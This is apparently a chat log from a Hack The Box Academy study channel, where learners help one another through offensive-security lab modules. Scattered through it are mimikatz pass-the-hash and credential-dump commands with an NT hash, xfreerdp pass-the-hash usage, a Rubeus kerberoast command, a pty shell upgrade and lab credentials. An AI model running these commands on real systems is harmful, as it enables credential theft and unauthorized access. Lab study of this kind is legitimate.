@next bronze just to update: I just did the WSUS section on EU-6

yep did it too, finally finished the module

US servers are patched as well now 🙂

After the TGT of the hacker user gets loaded into memory, I can directly access C$ share to get the flag. I also get the NT hash of lab_adm user and when I try to perform Pass-The-Hash as follows, I get the error, why?
.\mimikatz.exe privilege::debug "sekurlsa::pth /user:lab_adm /rc4:663715a1a8b957e8e9943cc98ea451b6 /domain:inlanefreight.local /run:cmd.exe" exit

0x00000005

ERROR_ACCESS_DENIED

Access is denied.
are you running it as admin?

Do you have bullet echo hack?

With the Powershell as administrative privilege, I get another error

I'm doing this module: https://academy.hackthebox.com/module/54/section/485

But I didn't get a result. Do you know why?

┌──(kojin㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://94.237.53.157:54182/FUZZ

https://github.com/gentilkiwi/mimikatz/issues/214

from my view there's very few reasons that you'd want to pth in windows once you got a hash, doing it remote or using rdp would be way cleaner

how can I do that?

In the Password Attacks module Pass The Hash section, I know mimikatz or Invoke-TheHash to perform Pth

Intro to C2 with Sliver- Kerberos Attacks

https://academy.hackthebox.com/module/241/section/2692

Hello I have been trying to kerberoast for 2 days now and LDAP query fails with all sliver tools, GetUserSPN, and Rubeus. I have switched VPN and it also did not help. Did anyone have this issue?

impacket, netexec etc

connect via rdp with the flag /pth:<hash> or impacket-psexec

But from linux machine the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL server is not reachable.

So I do pivoting and then perform pass the hash?

pivot

maybe include the error

can i get some help with this error?
proxychains: can't load process 'xfreedrdp'. (hint: it's probably a typo): No such file or directory

its for Pivoting, Tunneling and Portforwarding>Dynamic Port Forwarding w/ SSH & SOCKS Tunneling>Q2

there might be a hint in the error

my guy

hint: it's probably a typo

freedrdp

This is not my screenshot I turned PC off but my command was
Rubeus kerberoast /nowrap /user:alice/format:hashcat
But the error is same LDAP query failed

i need new glasses lol

The username or password is incorrect

That part was not on my error

I can send actual error once I go back

ok so i'm having the same problem with that question - port 3389 is shutdown, doesnt appear RDP is running on any other obscure ports

it is most likely open as they give the username and password to connect. Hard to say much more from the infos you gave. Maybe double check your previous steps

can you nmap the windows target via proxychains?

yeah that's how I know its closed

are you sure your ip is correct?

no actually I'm a bit confused, heres the ifconfig from the ubuntu machine- the question calls for a different IP

I tried with crackmapexec and evil-winrm with chisel proxy, but both of these commands give socker timeout error:

Will try this one tomorrow

You mean instead of /rc4:{hash} do /pth:{hash}?

ok so you see, ens224 is the interface 172.16.5.0/23 on linux host
This interface is on the same network as the windows host you want at 172.16.5.19
So you pivot on that interface. Redo the steps from the course

any1 facing problems with the XXE CDATA data exfiltration method from web attacks ?! I copied and pasted the same exact commands as shown and made sure several time but its still not working

without knowing how you have set up the pivot it's hard to say, make sure the ip is correct

i mean replace the password with the hash
````xfreerdp /u:user /pth:<hash> /d:<domain> /v:<ip> ```

thanks, i think i get it now

once you are connect, beware with evil-winrm and mimikatz, you have to make the command on one line:
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

does anyone know if I'm supposed to be able to access the AutomateDCAdmin from the vfrank rdp connection in the Skills Assessment for Pivoting, Tunneling, and Port Forwarding ? its the last question

i don't recall anything about AutomateDCAdmin

Hello! I'm having trouble with the password cracking module. I'm told to crack this hash 7106812752615cdfe427e01b98cd4083

After doing hashid, I get
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x

And in the hints I'm told to use one of the rules that come with hashcat

I tried a few, but none of my attempts were succesful

I tried the md5 and ntml hashes first, with rockyou and the first two predefined rules in hascat, but I wasn't lucky

I searched on the internet and found the following command
"hashcat -a 0 -m 1000 -g 1000 hashNTLM /usr/share/wordlists/rockyou.txt"
but it didn't work, since -g 1000 is generating random rules

Can anybody point me in the right direction please? Thank you!!

the last question was : "Submit the contents of C:\Flag.txt located on the Domain Controller. " and I see a network drive but I do not have access to it from vfrank's machine, I might be missing something or I have to further enumerate from his machine. I tried using pypykatz again to dump lsass creds but none of them gave me any users to further enumerate

you are on the right track with the drive

use rockyou + a built in rule

Yes, but is there any way to determine which rule I should use or do I have to try all of them? (Thank you btw)

best64 should work

or one of the rules you have used in the previous section

Didn't work... 😢

Also tried combinator

And rockyou3000 takes a long time

Ok, I got it, it was the 3rd rule.
Thank you for your help!!

Iirc yes

Iirc vf* is the last step

There are other attack vectors for MSSQL cf "Attacking SQL Databases" chapter

sry does that mean to remote in to vf*?

Yes

Rdp should be fine

I'm inside vf*'s machine with rdp and it says the network drive is disconnected, i can send a picture, not sure if thats allowed or not

sent it in dm so I do not put any anwsers here

I've tried stealing svc account hash aswell.

I've enumerated all non-default db's.

Also got SMB access for f...., j..., s...., mss.....

I know that there is a linked server but I haven't been able to progress with that.

I'm not accepting dms atm

It's a combination of impersonation and linked servers

it shows that the vf* user's network drive AutomateDCAdmin is disconnected

Reset the target and get to it again. I don't recall needing to do anything extra

will try

how are you trying to mount it?

Don't put the IP\ part also at this point it's spoiling

oh wait wat? i thought u can just access it

You should be able to

i see in my notes i mounted it via evil-winrm

What?

You don't need to mount it

Lol

It's automatically mounted (or should be) on that target

I didn't mount at all when I did it

you are certainly right, i lost trace of the end of the rdp attack chain, so maybe i got it in rdp session.... then i did the box without rdp and i have more notes on that.. well...

It's why I said restart the target

yea it just says fails to connect to the network drive even I reset the box

strange

Wait 5 minutes before connecting

Hi everyone! The whole streak thing in academy is neat, but I was wondering... are there any benefits to having a streak?

Like I love the encouraging messages

Or change vpn regions, respawn target, try again

Not atm

ah, I see

is it your command?
net use Z: \\<ip>\C$ /user:'INLANEFREIGHT.LOCAL\v*****' '*************' /p:yes

no i just went to the file explorer since I have rdp

Weird I didn't have to do that

and it says disconnected

It should just be mounted by default, you shouldn't have to

ill just wait 5 min before trying to attempt this time so it can load everything

ah!!! i found in my note the drive is there after connecting via rdp

Yeah it's always there

Sounds like the env being dumb

Hey! I'm having issues with zip2john, when I try to find the hash of a 7z file I get Did not find End Of Central Directory.

Also suggestion, log out [via the start menu] instead

Because 7z is a different format iirc

There should be a 7z2john

What academy module is this related to?

Password cracking

7z2john should be a tool

Yes, I found it, thanks (I'm dumb sometimes)

It looks like you're using '' and not " (double quote vs 2 single quotes)

yea nothing seems to make it connect to the network drive, it always starts as "failed to connect to network device" when I rdp in

It's weird

Yup I am.. have tried a few options now.. '...', '"..."', ""...""

Use C:\ maybe?

Also spoiling dude

At least cut out the [linked server] or something

Also you don't need to use open... if you have xp_cmdshell

are you inside a rdp session? i noted i used exactly the procedure in the course material to retrieve the files

Sqlcmd

^

I don't see how rdp session will make a difference

It shouldn't

As long as you're connected to the mssql client it's fine

heya, back again with another (likely stupid) question

currently stuck on the third question of Information Gathering - Web Edition > Skill Assessment, question 3 (What is the API key in the hidden admin directory that you have discovered on the target system?)

||using gobuster dir on this yielded no results except for /index.html||

||with gobuster (vhost) i was able to find w*.inlanefreight.htb:36964||

||which is slightly different from the one without w*, but just in the text it displays||

||I tried using gobuster (dir) to find directories of w*.inlanefreight.htb:36964 $ gobuster dir -H host: w.inlanefreight.htb:36964 -u http://inlanefreight.htb:36964 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ||

||but this yielded no results. not quite sure where to go from here. does anyone have some pointers? I'd prefer a hint over a solution, but a solution is also fine.||

Ayyyy I just got it :P :P

Thanks guys.

yay! what was the issue?

~~my bad, i found ||w*.inlanefreight.htb|| with ||finalrecon, not gobuster|| ~~

nevermind i was right the first time, it was with ||gobuster||

also, question 4 is

After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.
I'm confused though, as i don't see anywhere for the crawler to go. the whole page is just:
<!DOCTYPE html><html><head><title>inlanefreight</title></head><body><h1>Welcome to inlanefreight.htb</h1></body></html>

and the ||w*|| version is just || <!DOCTYPE html><html><head><title>w*</title></head><body><h1>Welcome to w*</h1></body></html> ||

I don't know why I wasn't using xp_cmdshell.

When I realized, I also realized that something had to be enabled (which I was able to, through my admin perms)

how did u find the password? since I cant access the network drive might as well try other methods now

Don't include the subdomains (even in spoiler text)

Further subdomains

guys,at kerbrute,i have a list with 48k names which i want to test,and when i run it ,i get that 50 USERS EXIST.ok that sgood.How can i have these 50 valid usernames get outputed in a users.txt ,with only the names in each line?does kerbrute has a built-in function that does this

@hexed kestrel you can generally shorten things to first letter * i.e. w*.inlanefreight.htb

Spoiler text literally does nothing to mask

As anyone can click it

i dont know how to answer without spoiling too much. And since we are speaking in vague terms, I dont even know anymore of we are speaking about the same things : D

You'd use vf* password

i used his hash to rdp, cause I couldnt break the password. Maybe ill try other lists

you wont get it in a list

His password is in plain text

fair enough. will edit it

When you dump

and thanks will try that

General tip: if you can't find it, dig deeper

#Module: Introduction to Windows Evasion Techniques

Last question asks about signature version. Tried multiple cmdlets and version numbers presented (even those that don't make sense). Anyone DM?

@fathom pendant @wraith pelican yea... overlooked something in the dump output

Hey! Need a little help again.
I'm unable to perform mic cracking even though I've done exactly what the module says

I've extracted the hccapx file from the cap file with cap2hccapx tool from hashcat utils and then attempted to crack it with hashcat but I get "no hashes loaded"

Any idea??

Thanks!!

I think that particular tool is weird and doesn't work properly

Any recommendation?

I haven't done that module so can't advise

ok, thanks anyway for your time!

Yeah after several hours digging for a way in, it can easily be overlooked in all those lines! Glad you found it! Hey maybe edit some of the stuff you posted as it could be spoilers here and there .

will do

In the getting started Knowledge check right now, question is "gain a foothold and submit the user.txt flag" I've been looking at exploits, but everytime i try to do the exploit it says this, even though I logged in the admin page successfully with the credentials

Try a different exploit maybe?

Because one of the exploits doesn't require any authentication

Hello there
The question is about the foot printing module. There is a task to connect to a public folder on the target system and find the flag, but when I connect there is no flag, can you please direct me in the right direction?

Well it looks like there's a directory

Gonna have to navigate a bit my dude

is meterpreter like a shell, will I need to run the reverse shell one liner?

How connect in directory on SMB folder?

I'm confused on what meterpreter is, it didn't really get covered in the getting started module

Meterpreter is a type of shell for msfconsole

All you need to know is that once it connects, type shell and you're dropped into the shell env

okay im in, and i've basically searched all dir without a user.txt flag

spoke to soon

Also you might need to upgrade the shell with the python one-liner
python3 -c "import pty; pty.spawn('/bin/sh')"

Trying to find possible ways for privilege escalation right now, but when trying to transfer LinEnum over im getting this error

you need to download to a folder that you have write access to

e.g., /tmp

oh i see

what is the command to specify where to download?

-s?

you can simply cd to that directory and do the command again

i forgot what the flag was to specify output file location but you can check the help command

I've removed from the permission denied dir and added it to tmp and now getting this error

I also tried /tmp/LinEnum.sh

What are you doing

what module?

Knowledge check on the getting started module

Privilege escalation to get root

Are you running the http.server in the directory LinEnum.sh is in?

Also linenum isn't required

that would explain why, I assumed http.server would be all directories

Nope it's the current directory, and any subdirectories

ah makes sense

You should check what your user can (su)do

I can run a .php file

Could I use that in someway to gain root acess

Check out gtfobins

No, you can run the /bin/php as root

Gtfobins will help you from here

gtfobins looks like a lot haha, but yes I can run /bin/php as root

I may be stupid, but how will gtfobins help me here?

oh it's the bin folder right?

a binary is a bin folder

apologies for stupid questions, figured out what gtfobins is

and it's just given me the flag appreciate the help

Hey it’s nice you found the answers to your question, there is a lot to figure and you did it!

thank you, there’s definitely a lot to uncover, i’m getting there step by step, i’ve realised my notes need to be more detailed than just commands

greetings, I'm on the footprinting easy lab, trying the DNS server, I ran the dig commands, found subdomains and stuff, but no flag, and I don't know how to get any further

Still stuck?

@cunning quarry

thank you

include the module and section name, what you have tried and any errors thanks

I figured it OUt!

good job

which channel do I message in if i need help with a specific module and cannot find any help online?

community-help-zone?

this one 🙂

oh the #modules ?

Yes, the channel you are in also check out #welcome to get urself verified to get access to different channels

ok cool, thanks for the help, my question is kind of long.

I have a question on the module about vulnerability assessment, it says that we need to start up nessus and log into the GUI with https:// < IP >:8834. ok so i do that, but nessus does not come pre installed. No issues I think, the module teaches us how to install it, it probably wants me to do that. But when I install nessus on my parrot VM it says out of space. I need to resort to deleting my audio drivers and some of the password dictionaries that are a few 100MB to clean up space. So i was thinking, well if (HTB) doesnt give each VM enough space for NESSUS then im probably doing it wrong. maybe i need to spawn in a VM and ssh to the spawned in VM and do nessus all from the CLI? i mean it will be harder but sure i can try? so I ssh into the spawned VM, with the provided "htb-student" and password "HTB@cademy_student!" and no nessus isnt there either. So now im really confused? we cant install nessus on the VM without deleting preinstalled hacking tools HTB gives us. I also cant figure out why we need to spawn in the other vm in the first place the server we need to do a vuln scan on is this 172.16.16.100. and the server we spawned in is random everytime. so why do we need to spawn in the VM? I MUST be doing something wrong. I know this is important

"The Nessus credentials are: htb-student:HTB@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus."

but I cant figure out how this plays a role into setting up nessus? Its probably very simple and obvious, but I havent seen another person online have this question, so it makes me think its a very simple/ stupid question. thank you very much for the help

oh my goodness a wall of text

nessus is running on the spawned target, not pwnbox

you should also ssh into the ip provided. you can spawn the target above the questions

ya sorry for the long winded msg, i just wanted to make sure I was getting the whole picture across. probably TMI on my part

when i checked the spawned target and did a find / -name 'nessus' nothing came back? I also did a whereis nessus. same results no hits for nessus, so i came the conclusion that nessus wasnt on the spawned VM?

https://spawnedtarget:8834

go to the Nessus Skills Assessment section and you will be able to spawn the target with nessus running

OHHHH that was my issue, i was ssh'ing into the spawned server. and downloading nessus on my parrot VM. I never tried https://spawnedtarget:8834/

let me try that

yall are so gosh darn smart! thank you so much for the help!!! worked like a charm

Hi, I am stuck at Linux PE, Kernel Exploitation. I cannot seem to find the correct exploit to gain root shell despite using Linux Exploit Suggester. Is there anyone who can help to nudge me?

you can use the same exploit as the section, but check the note on using a more recent version

Hi, OSINT: CORPORATE RECON [Domain Structure] In which country is the Chief Financial Officer (CFO) located? The answer is Germany. I knew the problem and solved it. But I don’t know the answer to your other question. While solving another problem, I found out through a site called Zoomeye that the parent company of inlanefreight.com is digitalocean LLC, and I don’t know how to solve it after that. Please let me know… ㅠ And I don’t know how to format the last question

I am stuck on the skills assessment for Information Gathering - Web Edition question 3. I have spent days on it and I am sure I have tried everything at this stage, but cannot find any directories. I have used ffuf, gobuster, Zap fuzzer, basically every tool and more from the unit

Hi All! Hope everyone is ok!
Considering to build my own home lab...still watching lots of yt videos and stuff...which option would be better a physical lab or a cloud one? In terms of performance, pricing and also on how good it might looks in terms of project documentation?
Thank you!!

so maybe it is not a tool issue? if you stick to the tools in the course it works fine. Read again the assessment brief, there are big hints on what you have to look for.

Is this a good place to ask a question for help on the 'Footprinting' module in the academy?

Hello guys, can anyone help me from cyber bullying

Someone is faking my Instagram id , please someone help me